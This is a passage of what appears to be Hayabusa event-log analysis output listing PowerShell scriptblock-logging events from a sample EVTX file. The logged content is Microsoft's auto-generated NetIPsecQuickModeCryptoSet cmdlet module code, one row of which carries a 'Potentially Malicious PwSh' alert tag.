[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.659 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = 